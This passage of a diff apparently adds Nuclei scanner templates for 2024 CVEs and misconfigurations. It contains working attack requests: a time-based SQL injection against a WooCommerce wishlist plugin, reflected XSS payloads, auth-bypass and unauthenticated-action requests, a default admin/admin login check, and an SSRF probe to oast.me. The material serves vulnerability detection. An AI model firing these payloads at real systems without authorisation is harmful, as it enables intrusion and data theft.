- 'contains(tolower(body), "lobechat")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /api/proxy HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
http://oast.me
matchers:
- type: word
part: response
words:
- "<h1> Interactsh Server </h1>"
# digest: 4a0a00473045022100b6f794837ed630ad876ec08d70900f1d0923d863a28fe24a79bbd794c73691d902207a43d609d6fd37186ea6030b79d368f2d5b616cd4a8b71672448f8c584a903f3:922c64590222798bb761d5b6d8e72950

134
http/cves/2024/CVE-2024-43917.yaml Normal file
View File

@ -0,0 +1,134 @@
id: CVE-2024-43917
info:
name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.
reference:
- https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
- https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-43917
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-43917
cwe-id: CWE-89
epss-score: 0.00091
epss-percentile: 0.39641
cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
tags: cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- '"nonce":"([a-z0-9]+)"'
- raw:
- |
GET /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: product_id
group: 1
regex:
- 'data-tinvwl_product_id="([0-9]+)"'
matchers:
- type: word
part: body
words:
- 'data-tinvwl_product_id="'
internal: true
- raw:
- |
POST /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="form[tinvwl-hidden-fields]"
[]
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_id"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_name"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_type"
simple
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_id"
{{product_id}}
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_variation"
0
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_action"
addto
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="redirect"
{{RootURL}}/product-category/uncategorized/
------WebKitFormBoundaryNfcbSwJQX8ALWCMG--
extractors:
- type: json
part: body
name: share_key
internal: true
json:
- '.wishlist.share_key'
- raw:
- |
@timeout: 20s
GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "duration>=6"
- "contains(content_type, 'application/json')"
- "contains(body, 'product_id')"
condition: and
# digest: 490a0046304402207690eca3604b0ae310218e3e09ed7e01283fe3cd0058c463ba97588995b8fe2c02201c44b9bac4f09f86ce9b93a397b2f8753abade9745a84a35132428a34c99c286:922c64590222798bb761d5b6d8e72950

47
http/cves/2024/CVE-2024-45440.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2024-45440
info:
name: Drupal 11.x-dev - Full Path Disclosure
author: DhiyaneshDK
severity: medium
description: |
core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.
reference:
- https://senscybersecurity.nl/CVE-2024-45440-Explained/
- https://nvd.nist.gov/vuln/detail/CVE-2024-45440
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-45440
cwe-id: CWE-209
epss-score: 0.00046
epss-percentile: 0.17715
cpe: cpe:2.3:a:drupal:drupal:2023-05-09:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: drupal
product: drupal
shodan-query:
- http.component:"drupal"
- cpe:"cpe:2.3:a:drupal:drupal"
tags: cve,cve2024,drupal,exposure,error
http:
- method: GET
path:
- "{{BaseURL}}/core/authorize.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "getHashSalt"
- "RuntimeException"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022054ed249c58d1f97eacc44eec47d392c89f94f74b2c5b5e77d298817beb19de4302204074bcf02eae57de46bf5175d3bd645a995584246f4cf7349bd9f71e4246f905:922c64590222798bb761d5b6d8e72950

51
http/cves/2024/CVE-2024-46627.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2024-46627
info:
name: DATAGERRY - REST API Auth Bypass
author: gy741
severity: critical
description: |
Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.
impact: |
Allows unauthorized access to REST API
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-46627
- https://daly.wtf/cve-2024-46627-incorrect-access-control-in-becn-datagerry-v2-2-allows-attackers-to-execute-arbitrary-commands-via-crafted-web-requests/
- https://datagerry.com/
- https://github.com/DATAGerry/
- https://github.com/d4lyw/CVE-2024-46627
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-46627
cwe-id: CWE-284
epss-score: 0.00045
epss-percentile: 0.16328
metadata:
verified: true
max-request: 1
vendor: becon
product: datagerry
shodan-query: http.title:"datagerry"
tags: cve,cve2024,becon,datagerry,unauth,auth-bypass
http:
- method: GET
path:
- '{{BaseURL}}/rest/users/1/settings/'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"response_type":'
- '"model":'
- '"time":'
condition: and
- type: word
part: content_type
words:
- "application/json"
# digest: 4a0a00473045022040420efc711ffd5727fa72189da9f4e2830a0a1bd247edefb9c4392206bdcb5f022100c7c5849fa2e4cdc7240166da0a6077f3c93557cbded880103e8580c784fdb3f1:922c64590222798bb761d5b6d8e72950

70
http/cves/2024/CVE-2024-5488.yaml Normal file
View File

@ -0,0 +1,70 @@
id: CVE-2024-5488
info:
name: SEOPress < 7.9 - Authentication Bypass
author: pdresearch,iamnoooob,rootxharsh
severity: critical
description: |
The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.
reference:
- https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/
- https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-5488
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5488
epss-score: 0.00043
epss-percentile: 0.09608
metadata:
verified: true
max-request: 3
tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass
flow: http(1) && http(2) && http(3)
variables:
marker: "{{randstr}}"
username: "admin"
http:
- raw:
- |
PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- 'Sorry, you are not allowed to do that.'
internal: true
- raw:
- |
PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username+':aaaaaa')}}
Content-Type: application/x-www-form-urlencoded
title={{marker}}&description={{marker}}
matchers:
- type: word
part: body
words:
- '"code":"success"'
internal: true
- raw:
- |
GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"title":"{{marker}}","description":"{{marker}}"'
# digest: 4a0a00473045022100c95d50e7ed0073b424b5b0259135b11ea7bdca7a18c8b8f5ec23b5cb197c95860220742e8b72bc5d7d64ffdc413ce427470f0b96f7c9a4cc53c5d0298cfa2efe112d:922c64590222798bb761d5b6d8e72950

68
http/cves/2024/CVE-2024-6517.yaml Normal file
View File

@ -0,0 +1,68 @@
id: CVE-2024-6517
info:
name: Contact Form 7 Math Captcha <= 2.0.1 - Cross-site Scripting
author: s4e-io
severity: medium
description: |
The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.
reference:
- https://wpscan.com/vulnerability/d04bab9c-7cb4-4d21-b70b-a4a7fabc3c20/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6517
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-6517
cwe-id: CWE-79
epss-score: 0.00043
epss-percentile: 0.09608
cpe: cpe:2.3:a:dotsquares:contact_form_7_math_captcha:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: dotsquares-wpteam
product: ds-cf7-math-captcha
framework: wordpress
publicwww-query: "/wp-content/plugins/ds-cf7-math-captcha"
tags: cve,cve2024,wp,wordpress,wp-plugin,xss,ds-cf7-math-captcha
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"/wp-content/plugins/ds-cf7-math-captcha")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=dscf7_refreshcaptcha&tagname="<script>alert(document.domain)</script>
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"<script>alert(document.domain)</script>'
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4b0a00483046022100b027a0561626761eec561001fce02cfe13c26cf0c84b572a1759bac3a823fa32022100f7a35b349e671f6462ac3fb1f3e55ccec74ab7572338ce94ea7deddc14bbc5d8:922c64590222798bb761d5b6d8e72950

77
http/cves/2024/CVE-2024-7354.yaml Normal file
View File

@ -0,0 +1,77 @@
id: CVE-2024-7354
info:
name: Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
impact: |
Attackers can potentially exploit this vulnerability to gain unauthorized access to sensitive information.
remediation: |
Update the plugin to Latest version. Fixed in 3.8.11.
reference:
- https://wpscan.com/vulnerability/3c871dcd-51d7-4d3b-b036-efa9e066ff41/
- https://nvd.nist.gov/vuln/detail/CVE-2024-7354
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-7354
cwe-id: CWE-79
epss-score: 0.00043
epss-percentile: 0.09629
cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 3
vendor: ninjaforms
product: ninja_forms
framework: wordpress
fofa-query: body="/wp-content/plugins/ninja-forms"
publicwww-query: /wp-content/plugins/ninja-forms/
shodan-query: http.html:"/wp-content/plugins/ninja-forms/"
tags: cve,cve2024,wp,wordpress,wp-plugin,ninja-forms,xss
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "/wp-content/plugins/ninja-forms"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=nf-submissions&"><script>alert(document.domain)</script>=2 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '"><script>alert(document.domain)</script>'
- type: word
part: content_type_2
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100ebe3e3fa989e9981bc9b9c167b1cba1c8f1b70a6a6ee428a03e421eb8ee1fc2f0220422da9f508638f3e1e59189edcd58268db1d17e273dc400b89ce3bcfe0e0c92e:922c64590222798bb761d5b6d8e72950

41
http/cves/2024/CVE-2024-7714.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2024-7714
info:
name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
author: s4e-io
severity: medium
description: |
The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback
remediation: Fixed in 2.1.0
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-7714
- https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2024-7714
cwe-id: CWE-284
epss-score: 0.00043
epss-percentile: 0.09599
metadata:
verified: true
max-request: 1
vendor: ays-chatgpt-assistant-team
product: ays-chatgpt-assistant
framework: wordpress
publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"
matchers:
- type: dsl
dsl:
- 'regex("^true$", body)'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100bdbe7d7b2f2802d87ca36eead8ef342616ac2deb6b62ad553f0c670ecd70a9f202210090cdb0adf148998469c6456de76728a9b85a9d162b3ee02af89f59394e8c4c60:922c64590222798bb761d5b6d8e72950

46
http/default-logins/datagerry/datagerry-default-login.yaml Normal file
View File

@ -0,0 +1,46 @@
id: datagerry-default-login
info:
name: Datagerry - Default Login
author: gy741
severity: high
description: |
Datagerry was using default username and password was discovered.
metadata:
verified: true
max-request: 1
shodan-query: http.title:"datagerry"
tags: datagerry,default-login
variables:
username: "admin"
password: "admin"
http:
- raw:
- |
POST /rest/auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"user_name":"{{username}}","password":"{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"token":'
- '"token_issued_at":'
- '"token_expire":'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100cf8cc043be4a0b3dc195acf9b6ef53e752608e9095d2443fe3783cd935d4bec0022047df60ad555032dc21231c6899cf2213cef306d8841ed6d22810a8531d6e5f60:922c64590222798bb761d5b6d8e72950

41
http/misconfiguration/microsoft/aspnetcore-dev-env.yaml Normal file
View File

@ -0,0 +1,41 @@
id: aspnetcore-dev-env
info:
name: ASP.NET Core Development Environment - Exposure
author: Mys7ic
severity: info
description: |
The ASP.NET Core application is running in Development mode, which could exposes detailed error messages and stack traces on the '/Error' page.
impact: |
Exposing detailed error messages and stack traces can reveal sensitive information such as server configurations, file paths, source code snippets, and other debug information. Attackers can use this information to identify vulnerabilities and compromise the application or underlying systems.
remediation: |
Set the 'ASPNETCORE_ENVIRONMENT' environment variable to 'Production' and ensure that detailed error messages are not exposed to end-users.
reference:
- https://docs.microsoft.com/en-us/aspnet/core/fundamentals/environments
metadata:
max-request: 1
vendor: microsoft
product: asp.net-core
shodan-query: html:"ASPNETCORE_ENVIRONMENT"
verified: true
tags: misconfig,aspnetcore,exposure
http:
- method: GET
path:
- "{{BaseURL}}/Error"
matchers-condition: or
matchers:
- type: word
part: body
words:
- "<strong>ASPNETCORE_ENVIRONMENT</strong> environment variable to <strong>Development</strong>"
- type: word
part: body
words:
- "ASPNETCORE_ENVIRONMENT"
- "<environment include=\"Development\">"
condition: and
# digest: 490a0046304402202067b5f6070703eaccb234d9fadb99bbfd78c2791b0073c494f498788060e8c00220755457d24f6d89d0f60a1cb5227c29412c43da39da4fb7c53c17460ecd6b2f81:922c64590222798bb761d5b6d8e72950

28
http/technologies/wiki-js-detect.yaml Normal file
View File

@ -0,0 +1,28 @@
id: wiki-js-detect
info:
name: Wiki.js - Detect
author: righettod
severity: info
description: |
Wiki.js was detected.
reference:
- https://js.wiki/
metadata:
verified: true
max-request: 1
shodan-query: http.html:"wiki.js"
tags: tech,wiki-js,detect
http:
- method: GET
path:
- "{{BaseURL}}/_assets/js/app.js"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(to_lower(body), "wiki.js - wiki.js.org", "window.wiki")'
condition: and
# digest: 490a00463044022001a724774fd5edf512cecc0776374a7fe5dd50c53ae8c0fa9967bfe6fbbd299c02201363f742a5f7cff6393c7d7f704f808f73e20b3187b97ff420def6a38fa92cc8:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/ad-inserter.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100f855b969632608830c492ebb1574d9a38314813937beb3811c747baad140d7d2022100d20da679c343c7a07adc8cb885e7196d4248248710f6655e45d69ad8b896218a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/add-to-any.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502207961b980256585c81f22b4cc1dae99abeb025da35ed2f0e86116695fee505c59022100bc6a72b26e8dee2f7a66620d0599fcd75fbe6f8cc66a03785ba5b24c141974f4:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/admin-menu-editor.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008c0268a0f23aa612c79c8e1905f8d79904f15447578072c279dd9e0f7a7cd00b022100849f4cae589820bf482e6f51498b4797b90b2734f3e3ce118d0467df9e89ecac:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/advanced-custom-fields.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100916e279374637d5775ccdba2a2a268493b4b9790d900e73b85cfe0c565db5b8c022100921532a775e58fcbda8f70aaef89cb5148ac13b5158fd149881f02e0fde56ea0:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/akismet.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100ba6e7260be797adb3912e17342400941ecf803e5f3a928b7f11d6137574ce1e2022010210e3a468f9a4578d873df24ac2cbecc2ae79ffbb9b3998432d69e125ed334:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220528133e793081e203839b1b92b021e3deb5d7cf37ae7a4f41c99c57db9c778ac022100cca133f4c9ec02c70061a8f2c42edc97a96accaad189e8dfa1ae2121e023d1ea:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100a3554e4b70b2c4e0be5ef5260ab28e213288f158649d8475804647fc21b96cd2022100c8fc7c53d1ced043dd524edc5ed4ca025524e11de86596e5a1dc5512e7504fcf:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402207da31e410e136b94150036d421dfb4661ab9c7c3dbba091c79132be7e4be4573022035a458b8bdd8696d3144bbc7fe111adcfc5d101256ca349afd1d8dc4dcd1b93a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/amp.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ae8f43d308d940b28bdc931b082b4696027928f8533b0896ed1f30f3912b064c022100ac3a3954141297ac5c07fdfe67b1ce32274483530b19776ed6f910feb185a557:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/antispam-bee.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220323689f88c73d49bf3c01c82d5dbff2af6ba7fcacf57b4800eae1958d94f59b602206a980debf4d864f21c7762c8d6b7e2f2927db44caa025b579504cfca20fc6aa9:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/astra-sites.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502200736c6a53a052da3b5c3b1742fe37ee939f9c1903e37000d1cef13037721830f022100d648f07964aca2802d5062f475564c211545442f97b474438bd0c82b7bec4cf8:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/autoptimize.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100fb2bc8ba830af39fd7f788d90e8ae1dc8f1ce5ea642bf186514bdbe9bcd09a0d022100c1029536258da4e58ba36151406f8cdd25273e0371ca1eff1e64c1be0af38c90:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/backwpup.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502206c812725e38e325fccfb3c6a8f4012594ddbbde62601fcef48a662633054e35a022100d7b8a66c83eb4ce12df94c961d6a41685a1d8057011ae42f7988ee8ecf97aabd:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/better-search-replace.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210099e58b8cd84b5c6a5f514675878b05d842eeacdc55f6dc06411be854b89a0a8e02205b743f909d207586777c9c185eb06b22f8528946332b7ef9cac0c73f12c6eb61:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/better-wp-security.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210081164f01918cb5ddd9865154b4f08690bf2c1918f0dc30f01fa134464e525fd102200a318863e42e3506f6ed35215454b8db49624a000c88a707a1dd8cfa04531cee:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220039a8d82df5c96f0e9303e96733b16e2075a00d90a77131e98b536fdcc8b3973022100b1d12dd0b98fe344b8389b991c3457bff68790f93a4917c05edaddcc705ac59e:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502206f711c2c80fb94b3349fa0ded8d628d4bcad405807d40d90c69660ebb749c00c022100a36479be2c9a03866ea68c25f83a442574b27f03117b6525d533d9f191413637:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/breeze.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022026cab7478f43ea5a288155f0d5dff8850cdd0c51f14a07474ec3d20f3256558702200690da4c8ea4b05ca8510b1983fe09e0deec5caa68979c9a3b5c284cbb2c7182:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/broken-link-checker.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a0048304602210083675cfa91dae14f4ca39b9634d76e983aeb78b4838a77e956170852692c2949022100d01f913cb6c26942d4144592bb8caed79481d07316412b1bbe46729c79c047dd:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/chaty.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402204e22bc10d6eb6ef88da876f17b93f0b9f33b83a579e04a7bb0aec6013acfc4ca022017a2a686e84914fd4d8ea7f9cb09832d8578573e76bc54589291366f9cb360a2:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/child-theme-configurator.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402206b7ac475be191ea4ea310c9c8b92eef7d33834161512b51e49ecae1acba0168a022007956a03082c608b4e177b6ef24f32ef5e180cd3662e74114aadf0847cfdf109:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/classic-editor.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008b6b3ca35532a15123c6626c0f748e7d8dd51e5485ac123f4a48530432515cd4022100f2aafcae16191f04840ee38f19b494b64f591fd8fbbf369c3c9090626dd4538f:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/classic-widgets.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022050dff0f219f4bccd20c34743fff7cdf2a10cab982b88513251a31995e7c38c36022100b387791302a3df2d8cfdb58fcabe5c6e4c57f7fee62b4741e4ed55588216352d:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402200ede9ddd3f8ed458120fcb7b296579677ebc7a346c7c3e38f7d5fa01a0d6ee3102200ccff089eedc545a326d5ff80aeaf574e1773c6ac5bd40acd2e9cedf6d8a5a6d:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/cmb2.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502202718a28dfa509d25ee22cf98ee8bcfc71d167a4251d92ee6a183b9b831ea5edc022100f71dd2888542db050070d806b3a71e66dcb02197e0556c37f466ce2f0b26111b:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/coblocks.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402204d6a97bfb3589b47d5191337546b47de0bb81961602592af14b7a33a7d57a294022044cf32f0347d0b642a356e94a19c3c24253f49def0fa68e50350a88fd3a0ff6a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/code-snippets.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402201a8ae0215d80a5b24a855635b77777b373fd7927dd08be82d540d4bbc39c7c2e02201103ca640652089650d2648f75d3c0d251f73309a220dca0a0f25d4254682f23:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/coming-soon.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022018ded49f8e8fcc91c957d6dbe715f66776f4db25b77b8f3a45eb5b2bf506ca62022100f9cdb90915018e7647fb2e6b0868ffe2ad837d79ab939f87d57badebdceeee5d:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/complianz-gdpr.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402202aff14fc46f85bb18fd8a4257ce812b4625aed2f5409b6c0333a1bfa292170f8022067363494a038e9fc6c934c56c949ed357e5b859338b73b70a8942ab8b0540e30:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
